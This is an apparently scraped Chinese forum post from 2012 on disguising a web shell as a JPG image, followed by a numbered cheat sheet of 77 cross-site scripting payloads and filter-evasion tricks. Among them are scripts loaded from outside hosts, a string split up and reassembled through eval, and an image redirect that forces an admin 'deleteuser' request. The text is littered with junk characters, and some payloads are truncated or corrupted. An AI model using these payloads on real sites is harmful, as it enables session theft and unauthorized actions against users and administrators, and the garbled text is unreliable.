跨站图片shell
; J# |8 F4 z) kXSS跨站代码 <script>alert("")</script>( {6 V) j# b% y+ ?7 u! I
& F, w3 A" M1 @- I
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马1 ]8 S9 U! x$ n
: w, R" N5 H! w( {3 N* e' V
' ^6 [- g9 ^+ D: R# V& E# e9 Y3 y ], q2 V/ ~
1)普通的XSS JavaScript注入
: l% ^- H) |% @7 w4 M5 V<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 J$ @+ X/ t. e* Y, c
b! K5 G! Q& ]& e2 l6 C/ U* P(2)IMG标签XSS使用JavaScript命令
0 q2 h! d7 _* }. M<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ V, y- f) p4 m2 z& T! Z1 w+ x: M, ~; }7 `5 I+ y
(3)IMG标签无分号无引号$ K( R' T% u. }; M9 J: m: s) ~5 ` a6 M
<IMG SRC=javascript:alert(‘XSS’)>( }8 I1 A( |/ D L7 O5 q- x8 O
1 O6 v: G+ z% H& X9 u( O7 E(4)IMG标签大小写不敏感
0 m, r* Z8 U4 e& W<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ l) ^' v+ j4 C2 [9 G+ O7 f3 `" `; ?" q3 }
(5)HTML编码(必须有分号)" V6 R- x% y' V4 B" E
<IMG SRC=javascript:alert(“XSS”)>& `' w/ D/ O0 t2 m
6 \: L: F/ Q ^) v8 w
(6)修正缺陷IMG标签
7 v) q( `% B& W5 Q<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
& t/ n0 r; u' o4 h1 x8 p, ?5 L2 \& y* {
(7)formCharCode标签(计算器)9 D7 y% z* y) |$ X( [4 d# q& L
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 i9 A+ K' Q9 Y4 ]8 @
' {; c8 I9 N5 \7 t( ~, u- M% J(8)UTF-8的Unicode编码(计算器)
' c; Q1 g7 N& I* U, |2 v, d: v<IMG SRC=jav..省略..S')>% ]) J5 D( J0 Z. d9 k
- u3 }% _" M, ^, |7 Q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)! e% c1 S O2 I
<IMG SRC=jav..省略..S')>4 ]2 j" `6 E) [0 O' v6 y. Y0 a7 G
( y# f3 D! g9 y2 \/ {, x3 f% A(10)十六进制编码也是没有分号(计算器)* B: C4 l4 s) F" X0 x) |
<IMG SRC=java..省略..XSS')>
5 K* c0 s5 _( |% r$ ]/ Q, d% V6 A1 `) o* F9 J
(11)嵌入式标签,将Javascript分开
_' {% x, Z/ x6 n+ R! [: B<IMG SRC=”jav ascript:alert(‘XSS’);”>; i* X1 Q: _4 Y# M! U* ?( h1 ~
) \4 Y4 E6 _7 P* b: B(12)嵌入式编码标签,将Javascript分开
6 C( r& P) D! f; P$ v0 v- @% q<IMG SRC=”jav ascript:alert(‘XSS’);”> [# r6 |9 D! X" _3 }1 D
- {& j/ p% T5 i- C4 Z( |: {
(13)嵌入式换行符
1 `- y" e+ Q$ }& e<IMG SRC=”jav ascript:alert(‘XSS’);”>$ J/ J+ S" C+ n, D) Y# z5 _
) @* _2 V; A+ T# e' k; Z7 s(14)嵌入式回车7 G; A3 e8 [( ]) Q* T9 G# ]) s
<IMG SRC=”jav ascript:alert(‘XSS’);”>* s6 E: x: h2 G4 T9 c; y
) v2 Y- ?5 y, L' i' w
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- p% i U5 _$ H6 k<IMG SRC=”javascript:alert(‘XSS‘)”>
# X; y4 r5 b. C. V, q; y) f8 O5 r1 D
(16)解决限制字符(要求同页面)) m2 x1 E/ U2 e3 \# F( z
<script>z=’document.’</script>& o1 M: o* K. D1 H, W( u
<script>z=z+’write(“‘</script>7 J' p& C% \1 J3 G
<script>z=z+’<script’</script>
" m7 ~$ K" O* X: D<script>z=z+’ src=ht’</script>
3 l1 u/ x8 B4 c1 `<script>z=z+’tp://ww’</script>
/ m: K2 K g9 p9 g* p2 R0 J5 J<script>z=z+’w.shell’</script>. N2 n7 V2 c; k
<script>z=z+’.net/1.’</script>( c) o) j& c& l/ r9 F
<script>z=z+’js></sc’</script>
m F+ i+ N0 p<script>z=z+’ript>”)’</script>
8 z1 a/ ~: N. C7 d9 E; C<script>eval_r(z)</script>$ D7 N4 I# [) S3 t' z. p+ Q7 J
7 U* X6 \2 e' V
(17)空字符
2 @9 f8 S9 s- \1 O9 Bperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
- P0 R |3 u5 n& d" Y2 i! ~: a% d" K( g& D" s; [% a
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用8 z3 x" U- r K6 }( x
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out1 ?# v% c8 o8 u" h% u
- ^4 u, s0 b# F" V C. [: c: q
(19)Spaces和meta前的IMG标签7 N4 [6 V6 Q: ~! m4 {3 Y) d
<IMG SRC=” javascript:alert(‘XSS’);”>! h6 \: O& K0 v& O6 W7 I
, f; B u3 ~8 s; e
(20)Non-alpha-non-digit XSS# {9 s! K& z- p. j, W" h- k3 z; D
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 M; C' s2 |. P8 L
9 w4 v2 w! ]' c$ u/ g7 \3 v(21)Non-alpha-non-digit XSS to 25 B7 o7 y9 H: Z- w/ y4 ^9 w5 `
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
, w! [2 \ H% t R5 [
1 N- y) J: d% B2 V9 C(22)Non-alpha-non-digit XSS to 3# I* C! L- o: |2 [
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; m7 l, B; v' H: Z3 R& v
8 _( a8 o1 O( a
(23)双开括号
- W$ K0 M% }4 o. V" w<<SCRIPT>alert(“XSS”);//<</SCRIPT>
" Y& U# m+ h! g) s
6 ~6 M" W! m0 p. B# }(24)无结束脚本标记(仅火狐等浏览器)- G9 K. [- ^" ` \$ w6 w
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ _) S( J+ K( R: M+ i! z- E
0 T w3 `( Y9 I# ?0 `5 U9 X(25)无结束脚本标记2
- o* Y' O. a C2 u! d<SCRIPT SRC=//3w.org/XSS/xss.js>) E* ~: n* S; r# q6 x8 j
/ [. Y$ Y( i( g5 k S6 {/ q(26)半开的HTML/JavaScript XSS! V! j9 u+ `# v! V- [* R5 j
<IMG SRC=”javascript:alert(‘XSS’)” e" A, `; P6 H) y: X% R4 _
3 t* b1 B% ^. A- w(27)双开角括号
+ j) Y* E Z( x; D3 K- w( A- X3 Z2 j<iframe src=http://3w.org/XSS.html <0 ~+ P' U8 S& p: p% t
) |' |" A7 q% F6 Y }. X) x(28)无单引号 双引号 分号( p _/ h: I* ?9 `- W
<SCRIPT>a=/XSS/
1 {$ }* U# N9 Y- j, d; e; Calert(a.source)</SCRIPT>7 {: `1 J/ r& e- f
" k! R+ w; ]. V" S
(29)换码过滤的JavaScript5 a' v/ K4 v+ I z: f
\”;alert(‘XSS’);//
5 ]5 f& C. e7 s$ ~& Y' t2 I2 g
) K' D3 d: ]8 g/ i(30)结束Title标签* Y2 S: r3 X) d0 p! l- [6 |% s
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& q, X, L f# d3 N/ J& q
$ n3 w1 B) n( `9 [! B2 L(31)Input Image9 \+ v/ h4 y6 A, _6 F3 C
<INPUT SRC=”javascript:alert(‘XSS’);”>0 M* M1 Y# a" r" Q" h
( e }8 |3 u% y, @% r0 m(32)BODY Image" r. D8 R5 b, c7 i$ k( t* i- n
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
I3 E1 Z! w1 @, H4 c5 B; c% _) \) I1 i9 D; S
(33)BODY标签/ b# X2 N9 L. p1 x( l
<BODY(‘XSS’)>0 } e! @) ` N* t+ _2 l
$ ^( Q, A! m4 r1 T& m# \" [: [/ r(34)IMG Dynsrc6 T. U) m! V3 a6 k6 j7 {) {
<IMG DYNSRC=”javascript:alert(‘XSS’)”>2 }: [" y& W6 l0 e
6 Q* `: B/ A* z: k% O: |(35)IMG Lowsrc/ c7 D: a3 W1 M6 U2 Y
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
# m/ S W+ k6 v0 ]9 B( Y, g3 ^/ [/ _7 ~
(36)BGSOUND
+ [: P+ H. M0 a7 E0 l' p \<BGSOUND SRC=”javascript:alert(‘XSS’);”>8 v& j0 P' ?8 t1 f' U$ d
7 ^; [5 W: T8 Y" R7 F3 h0 s4 N
(37)STYLE sheet$ Y+ O7 S% O3 m# L0 Z
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
+ r4 ^/ W9 S4 I. R+ V: n' H: h/ x, D% i5 H, m# V
(38)远程样式表0 z& U4 c# f) j7 O- q
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
2 x1 g2 s& u! y; \8 O
: Y8 w, e# N1 c(39)List-style-image(列表式)
, H4 Q o$ c+ k8 x* M7 H' B1 S/ J4 r<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
% o) f5 ] Y0 {4 ^$ W% Q$ F
& h( ~8 Z3 S1 X! w% i" J(40)IMG VBscript# A. S+ S( R- l: n2 \ l
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS2 Z/ L2 j0 O: h4 {1 v. E
1 u3 \% b; ]: ^
(41)META链接url
' m' k# ~. n% i) d8 S<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”> H2 S) c9 O" E6 N0 S
1 w8 k% S8 ^+ i5 M/ a+ x+ ?/ _9 T. q$ @(42)Iframe
8 e- @6 P: F2 E# z8 p' N4 j<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>/ t, z# }4 u6 Q) X, G1 w9 }; W6 C
(43)Frame6 P/ _8 d3 h5 p
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
6 G2 W; h: }! R x' Q% P4 q
. j/ }0 v% O$ H" ~ r(44)Table
5 P; q- [4 [8 z" D: F<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! |# Z9 R" M* O+ t4 _5 y) g
, F: _" H* Y- Z i# \# c6 d3 O(45)TD
" O) S Z0 G" F8 d5 l<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>! w& |2 m( ?( a5 }3 Y1 r
! K3 F; f- O4 U& S1 L3 ^
(46)DIV background-image1 O# B1 e1 O& `9 A+ ~
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
6 {7 Z. f+ G5 S' Q7 F5 I8 n' i7 |) \1 d
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)/ [' g5 H1 g9 g6 o' Y& ]- Y" J
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
6 w, R* c/ L# R' P+ p* J( j4 ]% A! Y5 _1 g p, w! E) ]
(48)DIV expression2 [+ b- `( M( U9 [8 U% H
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
( n; D! ]6 e) [" D: Q% @/ _
! Z5 x/ q9 ]5 f3 E(49)STYLE属性分拆表达
3 w+ R5 A( o" z+ |! Q<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>4 g4 g, ?: `& Y! X, q" n9 X3 I9 o/ r
" ]7 k( Z' U% k8 S& e7 B6 s3 p" F(50)匿名STYLE(组成:开角号和一个字母开头)
+ W+ Y0 \) y$ P: U& g# P: t; | N( X- m<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>3 n, J' V# a; X1 W6 v; M) h4 Y4 q
! M# H; o5 B% Z
(51)STYLE background-image& m5 f" y. Q2 K6 V& ~% ^$ H
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
* z" K7 ]$ l+ F9 g8 E4 l9 i
5 F! Y% g7 c* Q(52)IMG STYLE方式
9 y8 C- z0 d6 H, a5 Fexppression(alert(“XSS”))’>
+ s6 M8 I. D1 k0 z" j8 A$ R) S7 U& O# x3 y0 K$ [% I5 _4 |
(53)STYLE background
* Z% d1 f; s8 c. K* U d* B<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
( e% `6 [, y, s3 S7 Q' P, V* n8 s8 m5 B* M$ u
(54)BASE4 t3 n6 Z b9 {/ f0 f: @; e
<BASE HREF=”javascript:alert(‘XSS’);//”>
4 `3 y7 q$ u* K% Y2 K9 Y# k
6 |; _0 _& Q% m" ^. e(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
I) `6 p9 P# ?$ b: Z<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>: {$ l% b. ~5 a' { p* ?
; l1 R, D( A# k, z(56)在flash中使用ActionScrpt可以混进你XSS的代码
* t1 f/ [2 ]! c/ U4 Ja=”get”;
& c- K) ~& k0 r2 |% ub=”URL(\”";$ L% [- B6 a$ ^$ W
c=”javascript:”;( B4 X4 {: `# F- z" U
d=”alert(‘XSS’);\”)”;" C* _. R) j1 j/ A! D5 z
eval_r(a+b+c+d);1 O: J0 _- e: _
6 B! E/ P6 i P5 m; E, ~( M: t
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
( o1 w% b' f7 x<HTML xmlns:xss>( ~- R& j8 L7 D
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
2 L$ a3 @" S: W<xss:xss>XSS</xss:xss>
. p i- b* A0 [9 I+ i% E' x- G' ]+ H</HTML>$ K: @, y- A4 o3 \
/ P1 l: G( A4 x$ m9 W(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
w3 y* c8 t8 c$ A, z<SCRIPT SRC=””></SCRIPT>" V' |' @6 ?3 P5 L# |4 p& T
/ z9 h% K8 N2 c! ~8 h% m(59)IMG嵌入式命令,可执行任意命令
( z1 r) i( c Y# |5 ?- p5 S& b. l<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' n% d0 Z) f- g* w' c; `1 F! B9 g8 g
(60)IMG嵌入式命令(a.jpg在同服务器)
6 Q- h$ |4 z5 ^/ [Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser. {0 r1 X$ c0 c4 a5 g
6 e: _! I' o) C(61)绕符号过滤$ ?. U F; t. ~3 B- |7 f7 j0 _
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>* U/ r! q/ S( N( {
9 X4 @# y# w0 W' h' p2 F(62)" x2 [) O/ b- V$ a8 Q: c' O5 X* r
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 W6 R, ?* J3 H+ H1 C
2 z- ~" c+ n" F8 r
(63)2 j8 R3 G* Z5 t6 o# D
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>8 f* _0 N" i% W8 G9 x1 `* l p
: B. r! S7 U. C4 O) I# e" |" b
(64)2 z k0 w. p* [7 }% ^$ `& A- s
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>2 G k8 x$ N" {0 H4 }* d5 N+ C
1 Y$ R5 O1 }/ C(65)
4 L/ b& ~. r: R. V0 A<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
4 I- ^. P8 g r" {# \- B$ @1 X! e/ E4 k3 _3 n
(66)
! t4 j. u5 m( e; N" H z Q2 j! v% D<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>/ N! G( S4 l8 e5 Q- I
9 t# O9 M' Q* ?) ^2 Q(67)! Q i2 X6 c& c% c B! E( |) p
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>! y( S- b; f$ ]8 l, Q9 F. U' {: B
5 L: Y5 _, Z0 y(68)URL绕行 L6 _) k) h0 H$ i: v
<A HREF=”http://127.0.0.1/”>XSS</A>4 D9 O( X) z. R4 ~2 q4 I' O# S: s
) {, I2 j4 f7 t: T6 h1 g+ L(69)URL编码
' w3 d& U* h9 V3 P1 b- M* p& }<A HREF=”http://3w.org”>XSS</A>
5 b0 O+ z1 a7 c
( @1 w/ j0 d) e* E) X(70)IP十进制+ @% q& s* x3 b$ p
<A HREF=”http://3232235521″>XSS</A>8 B/ a! C; Z( o7 g( f6 i3 h2 ~. X
& ^+ W' l. W. e% S& s5 A. u4 B- H
(71)IP十六进制
2 }. K. G' `& N; i& d' c<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
9 ^" `0 W/ s$ f9 D8 V. a/ z9 L$ z5 t" E y
(72)IP八进制1 k+ `# o4 j7 t3 v. E
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 i% d3 Y+ j0 `1 V v& ~* B6 i- B/ {: D( V
(73)混合编码
! P, e) A4 J) l1 }& `! Q<A HREF=”h/ J; B& o+ d; v/ K6 n7 E
tt p://6 6.000146.0×7.147/”">XSS</A>
, Q! a8 ^* L g, N3 v; J' D4 g% F# Y
(74)节省[http:]/ w u% a& F R3 p2 D4 {8 M# c
<A HREF=”//www.google.com/”>XSS</A>9 R! |. a3 z7 ]. s1 L5 R/ h
! Z: p/ D) k' K; q8 C' D4 f; X(75)节省[www]1 _( p) w! x+ H- r: a$ y# e9 p$ j" t# n
<A HREF=”http://google.com/”>XSS</A>
* k3 ] X1 N6 }6 f( A, f& P+ ]2 c' g7 [/ P6 \2 \7 T5 h; {
(76)绝对点绝对DNS( g% ~- f2 t* {
<A HREF=”http://www.google.com./”>XSS</A>
" L( }9 o$ b' r4 h) ?2 a$ M% f( M( ^
(77)javascript链接
' Y" s9 j5 L4 R r ~<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>4 i- a" W9 S3 @0 W3 `* j
|
发表于 2012-9-13 17:04:56
收藏
支持
反对